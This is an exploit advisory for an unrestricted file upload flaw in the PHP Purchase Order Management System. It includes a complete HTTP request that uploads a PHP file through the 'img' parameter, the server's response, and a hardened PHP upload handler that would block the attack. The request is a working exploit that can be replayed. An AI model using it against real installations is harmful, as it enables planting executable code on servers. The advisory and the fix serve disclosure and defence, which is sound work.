## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit
## Author: nu11secur1ty
## Date: 11/08/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The `img` parameter is vulnerable to an unrestricted file upload (the server accepts and stores a `.php` file). This makes it easy for malicious users who are already logged in to this system
to obtain sensitive information or, even worse, to destroy the system very easily.
STATUS: HIGH - Vulnerability
[+]Exploit:
```
POST /purchase_order/classes/Users.php?f=save HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0
Content-Length: 709
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjZa6BqBYZRIp8V
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/purchase_order/admin/?page=user
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="id"
1
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="firstname"
Adminstrator
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="lastname"
Admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="username"
admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="password"
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="img"; filename="info.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
------WebKitFormBoundaryoIjZa6BqBYZRIp8V--
```
[+]Response:
```
HTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 08:52:20 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
1
```
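As an added example, not code from POMS-PHP or the advisory, this is a hardened version of the kind of save handler the `img` field reaches; it would reject the `info.php` upload shown above. The function name, constants and destination path are assumptions.

```php
<?php
// Added example (not POMS-PHP code): hardened profile-image upload handler.
// All names and paths here are assumptions for illustration.

// Allowed extensions mapped to the MIME type the file CONTENT must have.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];
const MAX_IMAGE_BYTES = 2 * 1024 * 1024;

/**
 * Validate one $_FILES entry and store it under a server-generated name
 * in a directory outside the web root. Returns the stored file name.
 */
function save_profile_image(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or no file sent');
    }
    if ($file['size'] > MAX_IMAGE_BYTES) {
        throw new RuntimeException('Image too large');
    }
    // The client-supplied filename is untrusted: use it only to read the extension.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        throw new RuntimeException('Extension not allowed');
    }
    // Check the real bytes, not the Content-Type header the client chose
    // (the PoC sends application/octet-stream with PHP source inside).
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED_IMAGE_TYPES[$ext]) {
        throw new RuntimeException('Content does not match extension');
    }
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not a decodable image');
    }
    // Random server-side name: no user-controlled path parts or double extensions.
    $name   = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($destDir, '/') . '/' . $name;
    if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not store image');
    }
    chmod($target, 0644); // never executable
    return $name;
}

// Hypothetical usage: $stored = save_profile_image($_FILES['img'], '/var/app/uploads');
```

Serving the stored images through a handler that sets an image `Content-Type` (rather than from a PHP-enabled directory) keeps even a mis-classified file from ever being executed.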
## Reproduce:
[href](https://www.youtube.com/watch?v=XODY8SSz62c)
## Demo PoC:
[href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_8.html)
## Time spent:
00:05:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>